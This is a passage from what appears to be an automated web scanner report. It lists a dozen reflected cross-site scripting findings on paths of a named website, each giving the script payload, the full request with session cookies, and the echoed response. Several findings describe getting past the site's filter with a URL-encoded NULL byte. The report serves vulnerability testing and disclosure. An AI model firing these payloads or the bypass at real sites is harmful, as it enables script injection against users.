Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 365

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta/2257.seam%0025f5e<script>alert(1)</script>cfd603108de</code>
...[SNIP]...

4.573. http://www.videobox.com/beta/clear_channel.seam [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/clear_channel.seam

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 19c8b<script>alert(1)</script>6912924b304 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beta19c8b<script>alert(1)</script>6912924b304/clear_channel.seam HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 371

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta19c8b<script>alert(1)</script>6912924b304/clear_channel.seam</code>
...[SNIP]...

4.574. http://www.videobox.com/beta/clear_channel.seam [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/clear_channel.seam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %002595a<script>alert(1)</script>7c98cd8e34e was submitted in the REST URL parameter 2. This input was echoed as 2595a<script>alert(1)</script>7c98cd8e34e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /beta/clear_channel.seam%002595a<script>alert(1)</script>7c98cd8e34e HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 374

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta/clear_channel.seam%002595a<script>alert(1)</script>7c98cd8e34e</code>
...[SNIP]...

4.575. http://www.videobox.com/beta/contact_us.seam [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/contact_us.seam

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 59fd5<script>alert(1)</script>84186d1bd65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beta59fd5<script>alert(1)</script>84186d1bd65/contact_us.seam HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 368

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta59fd5<script>alert(1)</script>84186d1bd65/contact_us.seam</code>
...[SNIP]...

4.576. http://www.videobox.com/beta/contact_us.seam [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/contact_us.seam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %00b5642<script>alert(1)</script>c97638f5a4c was submitted in the REST URL parameter 2. This input was echoed as b5642<script>alert(1)</script>c97638f5a4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /beta/contact_us.seam%00b5642<script>alert(1)</script>c97638f5a4c HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 371

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta/contact_us.seam%00b5642<script>alert(1)</script>c97638f5a4c</code>
...[SNIP]...

4.577. http://www.videobox.com/beta/jobs.seam [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/jobs.seam

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 137bc<script>alert(1)</script>a047d695347 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beta137bc<script>alert(1)</script>a047d695347/jobs.seam HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 362

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta137bc<script>alert(1)</script>a047d695347/jobs.seam</code>
...[SNIP]...

4.578. http://www.videobox.com/beta/jobs.seam [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/jobs.seam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %00120b0<script>alert(1)</script>9de72e61887 was submitted in the REST URL parameter 2. This input was echoed as 120b0<script>alert(1)</script>9de72e61887 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /beta/jobs.seam%00120b0<script>alert(1)</script>9de72e61887 HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 365

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta/jobs.seam%00120b0<script>alert(1)</script>9de72e61887</code>
...[SNIP]...

4.579. http://www.videobox.com/beta/member/browse-clips.seam [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/member/browse-clips.seam

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1f8bf<script>alert(1)</script>f4f32e05e62 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beta1f8bf<script>alert(1)</script>f4f32e05e62/member/browse-clips.seam HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 377

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta1f8bf<script>alert(1)</script>f4f32e05e62/member/browse-clips.seam</code>
...[SNIP]...

4.580. http://www.videobox.com/beta/member/browse-clips.seam [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/member/browse-clips.seam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4d696<script>alert(1)</script>9cb653c8482 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beta/member4d696<script>alert(1)</script>9cb653c8482/browse-clips.seam HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 377

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta/member4d696<script>alert(1)</script>9cb653c8482/browse-clips.seam</code>
...[SNIP]...

4.581. http://www.videobox.com/beta/member/browse-clips.seam [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/member/browse-clips.seam

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload %0097cf3<script>alert(1)</script>b33575cd8a was submitted in the REST URL parameter 3. This input was echoed as 97cf3<script>alert(1)</script>b33575cd8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /beta/member/browse-clips.seam%0097cf3<script>alert(1)</script>b33575cd8a HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 379

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta/member/browse-clips.seam%0097cf3<script>alert(1)</script>b33575cd8a</code>
...[SNIP]...

4.582. http://www.videobox.com/beta/premium_channel.seam [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/premium_channel.seam

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f2caf<script>alert(1)</script>07e3f3d2bf3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /betaf2caf<script>alert(1)</script>07e3f3d2bf3/premium_channel.seam HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 373

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/betaf2caf<script>alert(1)</script>07e3f3d2bf3/premium_channel.seam</code>
...[SNIP]...

4.583. http://www.videobox.com/beta/premium_channel.seam [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/premium_channel.seam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %00a9d6a<script>alert(1)</script>fbf8756991 was submitted in the REST URL parameter 2. This input was echoed as a9d6a<script>alert(1)</script>fbf8756991 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /beta/premium_channel.seam%00a9d6a<script>alert(1)</script>fbf8756991 HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 375

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta/premium_channel.seam%00a9d6a<script>alert(1)</script>fbf8756991</code>
...[SNIP]...

4.584. http://www.videobox.com/beta/privacy.seam [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/privacy.seam

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d11eb<script>alert(1)</script>19af44959cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /betad11eb<script>alert(1)</script>19af44959cb/privacy.seam HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 365

